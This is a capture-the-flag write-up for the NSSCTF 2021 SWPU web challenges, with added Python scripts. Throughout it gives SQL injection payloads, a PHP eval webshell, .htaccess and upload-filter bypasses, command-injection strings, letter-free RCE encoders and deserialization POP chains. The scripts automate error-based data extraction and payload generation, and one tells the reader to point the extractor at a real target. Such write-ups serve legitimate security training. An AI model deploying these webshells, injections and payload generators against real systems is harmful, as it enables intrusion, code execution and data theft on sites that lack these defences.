[NSSCTF] 2021 SWPU web
SWPU:
web:
gift_F12:
View the page source directly:
easy_md5
Array bypass: md5() returns NULL (with a warning) when it is handed an array, so passing arrays for both values makes the two "hashes" compare equal.
<?php
I really learned something this time!!!
On auditing code that uses the md5() function:
https://blog.csdn.net/qq_42777804/article/details/90547641
easy_sql:
Option 1: sqlmap does it in one go.
current database: 'test_db'
Option 2: manual injection!
This one is really easy, but I went off track and ended up doing error-based injection!
UNION-based injection
First find the column count with ORDER BY:
/?wllm=1' order by 1--+
There are three columns in total (order by 3 still works, order by 4 errors out).
Next, get the database name:
/?wllm=-1' union select 1,database(),3 --+
The database is test_db.
Then list the table names in that database:
/?wllm=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test_db'--+
Dump the columns of test_tb:
?wllm=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test_db' and table_name='test_tb' --+
test_tb has two columns, flag and id.
Finally read the flag:
?wllm=-1' union select 1,database(),flag from test_tb --+
jicao
<?php
Construct it directly:
payload: /?json={"x":"wllm"}
This challenge tests the JSON format; very simple.
caidao:
The challenge gives a hint: just connect with Caidao (China Chopper) using the password wllm.
do you know http:
Just change the User-Agent to wllm.
./uplo4d/bd914ca4997d34857501cefab0064162.phtml
RA+K+8ei+_sf
easyupload1.0
A typical file upload:
Uploading an image succeeds:
Change Content-Type to image/jpeg
and the shell uploads successfully:
```php
<?php @eval($_POST['dccomics']); ?>
```
Connect AntSword to the corresponding path: http://1.14.71.254:28126/upload/shell.php
Connected successfully:
Found flag.php, but it is a decoy:
The real flag is in the environment variables, so upload another file that can run phpinfo() (the php extension is blocked, so that has to be bypassed).
phtml is filtered too.
Upload a system.jpg:
GIF89a
Then rename it to system.php (through AntSword, since the upload filter blocks the php extension):
Refresh in AntSword:
Visit system.php in the browser:
The platform kept having bugs that I couldn't fix; crying.
It suddenly uploaded successfully! happy!!!
easyupload2.0
This one can be hit directly with a phtml file:
GIF89a
easy-rce
<?php
From the code block:
There must be a url parameter; its value is passed in by GET straight into eval(), and the result is echoed back.
?url=system("ls /");
?url=system("cat /flllllaaaaaaggggggg");
baby-rce
Spaces are filtered, so ${IFS} stands in for the separator:
http://9511-5105c14c-fe3b-4356.nss.ctfer.vip:9080/rasalghul.php/?url=ls${IFS}/
http://9511-5105c14c-fe3b-4356.nss.ctfer.vip:9080/rasalghul.php/?url=cat${IFS}/flllllaaaaaaggggggg
ez_unserialize
Source:
Scan with dirsearch:
Check robots.txt
Source:
The code has one main class, wllm, with two properties, $admin and $passwd.
This challenge does not involve the __wakeup()/GC tricks, so there is no need to change the property count to 3 or any number above the real one.
include
The challenge says to upload a file.
Source:
This is a simple PHP stream-wrapper (php://) challenge:
?file=php://filter/convert.base64-encode/resource=flag.php
pgsql: sql injection quine
error
This is a SQL injection challenge.
Method 1: sqlmap in one go
Dump the databases:
Dump the tables:
Dump the columns:
Dump the FLAG:
Method 2: error-based injection
Dump the database:
Dump the tables:
Query the flag:
But only the first part comes back:
updatexml() has a length limit (MySQL shows at most 32 characters of the bad XPATH expression, and the 0x7e marker uses one of them), so use substr() to pull out the rest:
1' and updatexml(1,concat(0x7e,substr((select flag from test_tb),32,64)),1) --+
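The substr() step above generalises to any value longer than the error budget. The following Python script is an added example (my own, not code from the writeup or the challenge): it simulates the error-based oracle with a constructed fake flag, then loops the substr()/mid() slicing until the whole value is reassembled. The FAKE_FLAG, the regex-based fake backend and the assumption that the injection point is `... where id='<input>'` are all mine, not the challenge's.

```python
import re

# Constructed sample secret held by the simulated backend; not the challenge's real flag.
FAKE_FLAG = "NSSCTF{this-is-a-constructed-sample-flag-longer-than-31-chars}"

# MySQL shows at most 32 characters of the bad XPATH expression in the error message,
# and one of those is the 0x7e ('~') marker, so each query leaks 31 characters of data.
XPATH_ERROR_LIMIT = 32
CHUNK = XPATH_ERROR_LIMIT - 1

# Recognise the two payload shapes used on the page (whole value, or substr()/mid() slice).
_SLICE = re.compile(
    r"updatexml\(1,concat\(0x7e,(?:substr|mid)\(\(select flag from test_tb\),(\d+),(\d+)\)\),1\)"
)
_WHOLE = re.compile(r"updatexml\(1,concat\(0x7e,\(select flag from test_tb\)\),1\)")


def fake_mysql(injected: str) -> str:
    """Stand-in for the vulnerable endpoint (assumption: query is ... where id='<injected>',
    as on the challenge). Evaluates the injected updatexml() the way MySQL would and
    returns the truncated error text."""
    m = _SLICE.search(injected)
    if m:
        pos, length = int(m.group(1)), int(m.group(2))
        value = FAKE_FLAG[pos - 1 : pos - 1 + length]   # SQL substr()/mid() are 1-indexed
    elif _WHOLE.search(injected):
        value = FAKE_FLAG
    else:
        return "no error"                                # nothing leaked
    expr = "~" + value
    return f"XPATH syntax error: '{expr[:XPATH_ERROR_LIMIT]}'"


_LEAK = re.compile(r"XPATH syntax error: '~(.*)'")


def extract(oracle, subquery: str = "select flag from test_tb", func: str = "substr") -> str:
    """Loop the manual substr((...),32,64) trick: walk the value 31 characters at a time
    until a chunk comes back shorter than requested, then reassemble. func may be 'mid'
    when 'substr' is blacklisted (mid() takes the same arguments)."""
    out, pos = "", 1
    while True:
        payload = f"1' and updatexml(1,concat(0x7e,{func}(({subquery}),{pos},{CHUNK})),1) --+"
        m = _LEAK.search(oracle(payload))
        if m is None:
            raise RuntimeError(f"no XPATH error for: {payload}")
        piece = m.group(1)
        out += piece
        if len(piece) < CHUNK:      # last (possibly empty) chunk reached
            return out
        pos += CHUNK


def first_chunk_only(oracle) -> str:
    """What the single-shot query on the page leaks: just the first 31 characters."""
    m = _LEAK.search(oracle("1' and updatexml(1,concat(0x7e,(select flag from test_tb)),1) --+"))
    return m.group(1) if m else ""


if __name__ == "__main__":
    print("single query :", first_chunk_only(fake_mysql))
    print("chunked      :", extract(fake_mysql))
    print("chunked (mid):", extract(fake_mysql, func="mid"))
```

Against a real target, replace fake_mysql with a function that sends the payload in the wllm parameter and returns the response body; the stop condition (a chunk shorter than 31 characters) also covers values whose length is an exact multiple of 31, which is the boundary case the sample flag exercises.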
no_wakeup
First there is a very cute Paimon; opening it up gives a code audit. One word: audit!
The code has one class, HaHaHa, with two public properties, admin and passwd; as soon as __destruct() runs we get the flag.
The hard part: bypassing __wakeup()
This is a classic vulnerability, CVE-2016-7124 (PHP < 5.6.25 and 7.0.x < 7.0.10).
The property count declared in the serialized object just has to be larger than the real number of properties.
So change the 2 after the class name to 3:
O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
Thanks to the master: vscode+phpstudy
easyupload3.0
This is a file upload challenge; poking it with deliberately bad input shows:
the middleware is Apache/2.4.7, which together with the hint in the title (try pairing it with certain files) points to .htaccess for getting a shell:
First upload a .htaccess file:
```apache
<FilesMatch "dc">
SetHandler application/x-httpd-php
</FilesMatch>
```
.htaccess is Apache's distributed (per-directory) configuration file; it takes effect whenever AllowOverride All is set. This one tells Apache to execute every uploaded file whose name contains "dc" as PHP. (At first my upload wasn't accepted and I could only match on a suffix, but in fact FilesMatch is a regex over the whole file name, not just the extension, so it doesn't matter whether the uploaded file has an extension at all.)
Next upload the image shell:
Check whether it executes:
If the page doesn't render it (cannot be displayed), it worked!
Then AntSword takes the stage:
We're in!
Got the flag.
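To make the three easyupload bypasses concrete, here is an added Python example (my own, not code from the writeup or the challenge) contrasting a weak upload check of the kind these levels rely on with a hardened one. The GIF-headed shell, the .htaccess body and the exact filter rules are constructed assumptions, since the page does not show the server-side code.

```python
import secrets

# Magic bytes per allowlisted extension (assumption: only these image types are accepted).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Constructed samples, not files from the page: a GIF-headed PHP shell like the
# GIF89a uploads in the writeup, the .htaccess from easyupload3.0, and a harmless GIF.
SHELL_GIF = b"GIF89a\n<?php @eval($_POST['dccomics']); ?>"
HTACCESS = b'<FilesMatch "dc">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'
REAL_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";"


def _ext(filename: str) -> str:
    """Extension after the last dot, lower-cased; '' when there is none."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def naive_check(filename: str, content_type: str, data: bytes) -> bool:
    """Roughly what the easyupload levels do (assumed from the page, the server code is
    not shown): trust the browser's Content-Type, peek at magic bytes, blacklist a few names."""
    blacklist = {"php", "phtml"}
    return (content_type.startswith("image/")
            and data.startswith(b"GIF89a")
            and _ext(filename) not in blacklist)


def hardened_check(filename: str, content_type: str, data: bytes) -> bool:
    """Allowlist the extension, ignore the client's Content-Type, require the matching
    magic bytes, and refuse dotfiles (.htaccess, .user.ini) and anything holding a PHP tag."""
    del content_type                                  # attacker-controlled, never a security input
    name = filename.rsplit("/", 1)[-1]
    if not name or name.startswith(".") or "\x00" in name:
        return False
    ext = _ext(name)
    if ext not in MAGIC:                              # phtml, phar, php5, no extension: all rejected
        return False
    if not data.startswith(MAGIC[ext]):               # shell.jpg carrying a GIF header is rejected too
        return False
    if b"<?" in data:                                 # polyglot image shell; re-encoding the image is stronger
        return False
    return True


def stored_name(filename: str) -> str:
    """Never keep the client's name: random basename plus the allowlisted extension,
    so a FilesMatch rule like "dc" in a smuggled .htaccess has nothing to match."""
    return secrets.token_hex(16) + "." + _ext(filename)


if __name__ == "__main__":
    for fname in ("shell.jpg", "dc", ".htaccess", "cat.gif"):
        blob = HTACCESS if fname == ".htaccess" else (REAL_GIF if fname == "cat.gif" else SHELL_GIF)
        print(f"{fname:10} naive={naive_check(fname, 'image/jpeg', blob)!s:5} "
              f"hardened={hardened_check(fname, 'image/jpeg', blob)}")
```

The important design difference is that every input the page's bypasses manipulated (Content-Type header, extension spelling, file name, magic prefix) is either ignored or checked against an allowlist, and the stored name is generated server-side; in production the upload directory should additionally be served with PHP handling disabled so that even a mistake in this check cannot become code execution.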
finalrce
RCE with no output
Option 1: reverse shell
Most reverse-shell forms are filtered here.
But the target can't reach the internet, so use method 3 (write the command output into a file under the web root and fetch it).
First write the directory listing into a file:
Visit the file:
Find the flag; use tac in place of cat, and since "la" is filtered, replace it with the ? wildcard:
?url=tac /flllll?aaaaaggggggg |tee wllm
hardrce
Reference blog: RCE without letters or digits
RCE without letters
The ^ character is filtered, so bitwise NOT is used instead, because ~ is not filtered.
Negation produces non-printable bytes (every ASCII byte NOTed lands at 0x80 or above), so the result never matches the letter/digit regex:
Using the script from 套神:
s = "ls"
Run each of the following through the script and send the negated form:
?wllm=phpinfo();
?wllm=system(ls /)
?wllm=system(cat /flllllaaaaaaggggggg);
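The 套神 script itself is truncated on the page, so here is an added Python example of my own (not the original script) that produces the ~ payloads for any function call and checks them against an assumed filter of letters, digits and ^. The wllm parameter name is the page's; the filter regex is my assumption, since the server-side check is not shown.

```python
import re
from urllib.parse import unquote_to_bytes


def neg(word: str) -> str:
    """Encode word as (~%XX%XX...): every byte bitwise-NOTed and URL-escaped. PHP's ~ on
    a string flips each byte back, so the server sees the original text while the
    request itself carries no letter or digit (ASCII < 0x80 becomes >= 0x80)."""
    return "(~" + "".join(f"%{(~b) & 0xFF:02X}" for b in word.encode()) + ")"


def call(func: str, *args: str) -> str:
    """(~func)(~arg1,~arg2,...);  PHP 7 calls a parenthesised string as a function name."""
    return neg(func) + "(" + ",".join(neg(a) for a in args) + ");"


def passes_filter(query_value: str) -> bool:
    """Assumed filter for hardrce: after URL decoding, no letters, digits or ^ may
    remain. The exact server-side regex is not on the page."""
    return re.search(rb"[A-Za-z0-9^]", unquote_to_bytes(query_value)) is None


def reveal(segment: str) -> str:
    """Undo neg(): what PHP computes at runtime for one (~...) group."""
    raw = unquote_to_bytes(segment[2:-1])           # strip "(~" and ")"
    return bytes((~b) & 0xFF for b in raw).decode()


if __name__ == "__main__":
    for payload in (call("phpinfo"),
                    call("system", "ls /"),
                    call("system", "cat /flllllaaaaaaggggggg")):
        print("?wllm=" + payload, "passes filter:", passes_filter(payload))
```

The only printable characters left in the request are ( ~ ) , and ;, which is why this works where the ^ XOR trick does not; reveal() is handy for reading someone else's payload back into the function and arguments it calls.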
pop
There are three classes here. The only magic method that can be invoked directly is __destruct, and the class that has it, w22m, has a single property, w00m. This is where the charm of POP chains comes in: if w00m is assigned an object, then one of the ways to trigger __toString is to echo an object, so set w22m's w00m property to a w33m object. Likewise, the line $this->w00m->{$this->w22m}() in w33m is used to jump to w44m's Getflag, which is what gives control over the variables.
This one needs some thinking of your own!!!
payload:
?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D;
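Both the no_wakeup payload (count bumped from 2 to 3) and the pop chain above are ordinary PHP serialize() output with private/protected name mangling, so here is an added Python example (mine, not from the writeup) that builds both from a description of the objects instead of hand-editing strings. The class and property names come from the page; the visibilities (w44m::admin private, w44m::passwd protected, everything else public) are inferred from the %00 prefixes in the page's payload.

```python
from urllib.parse import quote


class PhpObject:
    """Object to serialize: cls is the PHP class name, props a list of
    (name, visibility, value) with visibility 'public' | 'protected' | 'private'.
    declared_count overrides the property count written into the O:... header."""
    def __init__(self, cls, props, declared_count=None):
        self.cls, self.props, self.declared_count = cls, props, declared_count


def mangle(cls: str, name: str, visibility: str) -> str:
    """PHP prefixes non-public property names: private -> \\0Class\\0name, protected -> \\0*\\0name."""
    if visibility == "private":
        return f"\0{cls}\0{name}"
    if visibility == "protected":
        return f"\0*\0{name}"
    return name


def php_serialize(value) -> str:
    """Subset of PHP serialize(): null, bool, int, str (byte length), nested objects."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # before int: bool is a subclass of int in Python
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle(value.cls, n, vis)) + php_serialize(v)
            for n, vis, v in value.props
        )
        count = len(value.props) if value.declared_count is None else value.declared_count
        return f'O:{len(value.cls)}:"{value.cls}":{count}:{{{body}}}'
    raise TypeError(f"unsupported: {type(value).__name__}")


def wakeup_bypass(obj: PhpObject) -> PhpObject:
    """CVE-2016-7124 (PHP < 5.6.25 / 7.0.x < 7.0.10): declaring more properties than
    are present makes unserialize() skip __wakeup() but still build the object."""
    return PhpObject(obj.cls, obj.props, declared_count=len(obj.props) + 1)


def as_get_param(obj: PhpObject) -> str:
    """URL-encode everything so the NUL bytes in mangled names survive the query string."""
    return quote(php_serialize(obj), safe="")


# no_wakeup: two public properties, count bumped to 3 (matches the payload on the page).
no_wakeup = wakeup_bypass(PhpObject("HaHaHa", [("admin", "public", "admin"),
                                               ("passwd", "public", "wllm")]))

# pop: w22m->w00m = w33m object (echoed, so __toString runs); w33m->w22m names the
# method called on w33m->w00m, which is a w44m with private admin / protected passwd.
# Visibilities are an inference from the %00 prefixes in the page's payload.
w44m = PhpObject("w44m", [("admin", "private", "w44m"), ("passwd", "protected", "08067")])
w33m = PhpObject("w33m", [("w00m", "public", w44m), ("w22m", "public", "Getflag")])
pop_chain = PhpObject("w22m", [("w00m", "public", w33m)])

if __name__ == "__main__":
    print(php_serialize(no_wakeup))
    print("?w00m=" + as_get_param(pop_chain))
```

Getting the visibility right matters more than it looks: a private or protected property serialized under its bare name is silently ignored by unserialize(), so the chain breaks without any error. The wakeup bypass only works on the PHP versions listed; on a patched interpreter the mismatched count makes unserialize() fail instead.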
PseudoProtocols
PHP stream wrappers (php://):
?wllm=php://filter/read=convert.base64-encode/resource=hint.php
After base64 decoding:
Go into the directory:
How to bypass file_get_contents()?
sql
Table names come back in the login banner: Your Login name:LTLT_flag,users
?wllm=
Column names: Your Login name:id,flag,id,username,
Spaces are replaced by /**/ comments, and having ... like stands in for where ... =:
?wllm=-1'/**/union/**/select/**/1,database(),flag/**/from/**/LTLT_flag/**/having/**/'1'/**/like/**/'1
Since right is banned here, use mid():
-1'/**/union/**/select/**/1,database(),mid(flag,1,40)/**/from/**/LTLT_flag/**/having/**/'1'/**/like/**/'1
NSSCTF{913183bf-4237-46ee-87fc-bf5cea266562}
babyunser
upload/5ad7c2191968b93f121869cd84f4e1b0.txt
hardrce_3
This one uses string auto-increment:
%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B'!'%3D%3D'%40'%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D'_'%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B
POST:
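The long payload above is built from a handful of repeated pieces, so here is an added Python generator of my own (not the original script) that reproduces the technique: derive "A" from an empty array, increment it into the letters of ASSERT and _POST, then call ASSERT($_POST[_]) so that the POST body is evaluated as PHP. The bootstrap expression is the one the page's payload starts with; the generated code is my variant (it initialises each word with '' instead of with $_), the POST body shown in the usage is an assumption because the page's is missing, and the GET parameter name is not on the page either, so only the payload value is printed.

```python
from urllib.parse import quote

# $_ = "A": [] cast to string is "Array" (the @ silences the notice) and '!'=='@' is
# false, which indexes as 0. This is the bootstrap the page's payload also starts with.
BOOTSTRAP = "$_=[];$_=@\"$_\";$_=$_['!'=='@'];"


def php_inc(s: str) -> str:
    """PHP's ++ on an alphabetic string (Perl-style carry): 'A'->'B', 'Z'->'AA'."""
    chars = list(s)
    for i in range(len(chars) - 1, -1, -1):
        if chars[i] == "Z":
            chars[i] = "A"
        else:
            chars[i] = chr(ord(chars[i]) + 1)
            return "".join(chars)
    return "A" + "".join(chars)


def letter(ch: str, out_var: str) -> str:
    """PHP that appends one character to out_var using only ++ starting from $_ ('A')."""
    if ch == "_":
        return f"{out_var}.='_';"          # underscore is neither letter nor digit: use it literally
    if not "A" <= ch <= "Z":
        raise ValueError("only A-Z and _ are reachable from 'A' with ++")
    steps = ord(ch) - ord("A")
    return "$__=$_;" + "$__++;" * steps + f"{out_var}.=$__;"


def build_word(word: str, out_var: str) -> str:
    """Assemble a whole word into out_var (my variant: starts from '' rather than from $_)."""
    return f"{out_var}='';" + "".join(letter(c, out_var) for c in word)


def simulate(word: str) -> str:
    """Check the step counts by replaying PHP's ++ semantics instead of trusting arithmetic."""
    out = ""
    for c in word:
        if c == "_":
            out += "_"
            continue
        cur = "A"
        for _ in range(ord(c) - ord("A")):
            cur = php_inc(cur)
        out += cur
    return out


def rce_payload(func: str = "ASSERT", superglobal: str = "_POST", key: str = "_") -> str:
    """$___ = 'ASSERT', $____ = '_POST', then ASSERT($_POST[_]). Function names are
    case-insensitive in PHP, superglobal names are not, which is why both are built
    upper-case. $_[_] relies on the bareword constant fallback, as the page's payload
    does; that is a notice on PHP 7 and an error on PHP 8."""
    php = BOOTSTRAP + build_word(func, "$___") + build_word(superglobal, "$____")
    return php + "$_=$$____;" + f"$___($_[{key}]);"


def is_alnum_free(php: str) -> bool:
    """The constraint the challenge imposes: no letters or digits anywhere in the payload."""
    return not any(c.isalnum() for c in php)


if __name__ == "__main__":
    p = rce_payload()
    print("payload value (URL-encoded):", quote(p, safe=""))
    print("alnum-free:", is_alnum_free(p))
    # Assumed POST body (not shown on the page): assert() evaluates the string as PHP code.
    print("POST body: _=system('ls /');")
```

simulate() is the check worth keeping: it replays PHP's increment rule rather than assuming ord(c) - ord('A') is right, which is how you would notice if a target word needed a lower-case letter or a digit (neither is reachable by incrementing "A", so such words have to be obtained another way).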